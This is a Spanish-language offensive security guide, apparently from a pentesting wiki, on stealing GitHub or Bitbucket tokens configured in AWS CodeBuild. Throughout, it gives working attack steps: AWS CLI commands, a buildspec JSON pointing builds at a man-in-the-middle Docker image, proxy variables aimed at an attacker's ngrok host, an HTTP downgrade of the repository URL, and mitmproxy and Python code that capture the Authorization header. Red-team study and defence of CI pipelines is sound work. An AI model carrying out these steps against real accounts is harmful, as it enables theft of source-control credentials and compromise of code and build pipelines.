AWS Codebuild - Token Leakage

Recuperar Tokens Configurados de Github/Bitbucket

Primero, verifica si hay credenciales de origen configuradas que podrías filtrar:

aws codebuild list-source-credentials

Via Docker Image

Si encuentras que la autenticación, por ejemplo, a Github está configurada en la cuenta, puedes exfiltrar ese acceso (token de GH o token de OAuth) haciendo que Codebuild utilice una imagen de docker específica para ejecutar la construcción del proyecto.

Para este propósito, podrías crear un nuevo proyecto de Codebuild o cambiar el entorno de uno existente para establecer la imagen de Docker.

La imagen de Docker que podrías usar es https://github.com/carlospolop/docker-mitm. Esta es una imagen de Docker muy básica que establecerá las variables de entorno https_proxy, http_proxy y SSL_CERT_FILE. Esto te permitirá interceptar la mayor parte del tráfico del host indicado en https_proxy y http_proxy y confiar en el CERT SSL indicado en SSL_CERT_FILE.

1. Crea y sube tu propia imagen de Docker MitM

• Sigue las instrucciones del repositorio para establecer tu dirección IP de proxy y configurar tu certificado SSL y construir la imagen de docker.

• NO CONFIGURES http_proxy para no interceptar solicitudes al endpoint de metadatos.

• Podrías usar ngrok como ngrok tcp 4444 para establecer el proxy en tu host.

• Una vez que tengas la imagen de Docker construida, cárgala en un repositorio público (Dockerhub, ECR...)

2. Configura el entorno

• Crea un nuevo proyecto de Codebuild o modifica el entorno de uno existente.

• Configura el proyecto para usar la imagen de Docker generada previamente.

3. Configura el proxy MitM en tu host

• Como se indica en el repositorio de Github, podrías usar algo como:

mitmproxy --listen-port 4444  --allow-hosts "github.com"

4. Ejecutar la construcción y capturar las credenciales

• Puedes ver el token en el encabezado de Authorization:

Esto también se podría hacer desde la aws cli con algo como

# Create project using a Github connection
aws codebuild create-project --cli-input-json file:///tmp/buildspec.json

## With /tmp/buildspec.json
{
"name": "my-demo-project",
"source": {
"type": "GITHUB",
"location": "https://github.com/uname/repo",
"buildspec": "buildspec.yml"
},
"artifacts": {
"type": "NO_ARTIFACTS"
},
"environment": {
"type": "LINUX_CONTAINER", // Use "ARM_CONTAINER" to run docker-mitm ARM
"image": "docker.io/carlospolop/docker-mitm:v12",
"computeType": "BUILD_GENERAL1_SMALL",
"imagePullCredentialsType": "CODEBUILD"
}
}

## Json

# Start the build
aws codebuild start-build --project-name my-project2

A través del protocolo HTTP

Un atacante con permisos elevados en un CodeBuild podría filtrar el token de Github/Bitbucket configurado o si los permisos se configuraron a través de OAuth, el token temporal de OAuth utilizado para acceder al código.

• Un atacante podría agregar las variables de entorno http_proxy y https_proxy al proyecto de CodeBuild apuntando a su máquina (por ejemplo http://5.tcp.eu.ngrok.io:14972).

• Luego, cambiar la URL del repositorio de github para usar HTTP en lugar de HTTPS, por ejemplo: **http://**github.com/carlospolop-forks/TestActions

• Luego, ejecutar el ejemplo básico de https://github.com/synchronizing/mitm en el puerto señalado por las variables de proxy (http_proxy y https_proxy)

from mitm import MITM, protocol, middleware, crypto

mitm = MITM(
host="127.0.0.1",
port=4444,
protocols=[protocol.HTTP],
middlewares=[middleware.Log], # middleware.HTTPLog used for the example below.
certificate_authority = crypto.CertificateAuthority()
)
mitm.run()

• Finalmente, haz clic en Construir el proyecto, las credenciales serán enviadas en texto claro (base64) al puerto mitm: